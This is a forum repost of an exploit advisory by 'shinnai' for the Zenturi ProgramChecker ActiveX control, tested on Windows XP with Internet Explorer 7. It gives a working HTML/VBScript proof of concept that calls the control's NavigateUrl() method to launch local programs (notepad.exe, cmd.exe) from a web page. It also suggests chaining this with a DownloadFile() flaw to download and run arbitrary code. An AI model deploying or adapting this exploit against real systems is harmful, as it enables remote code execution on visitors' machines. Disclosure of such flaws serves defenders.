发新话题
打印

Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit

Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit

复制内容到剪贴板
代码:
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
<b>Zenturi ProgramChecker ActiveX Control "NavigateUrl()" Insecure Method</b>

url: [url]http://www.programchecker.com/activeintro.aspx[/url]

author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://shinnai.altervista.org[/url]

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

I can&#39;t believe my eyes when I see what you can do with this ActiveX
(and I can&#39;t believe that this product is considered as antispyware).
You can use the "NavigateUrl()" to arbitrary launch local file from a pc.
Try, for example, to launch "c:\somefile.exe" and see what happen.
Imagine to use this method with the "DownloadFile()" one, you can download
something on the pc and run it without problems.
For the "DownloadFile()" vulnerability see:
<a href=http://www.milw0rm.com/exploits/4008>[url]http://www.milw0rm.com/exploits/4008[/url]</a>
-----------------------------------------------------------------------------

<object classid=&#39;clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5&#39; id=&#39;test&#39; ></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language=&#39;vbscript&#39;>
Sub tryMe()

test.NavigateUrl "notepad.exe" ,"shinnai" ,"_SELF"
test.NavigateUrl "cmd.exe" ,"shinnai" ,"_SELF"

End Sub
</script>
</span></span>
</code></pre>

TOP

发新话题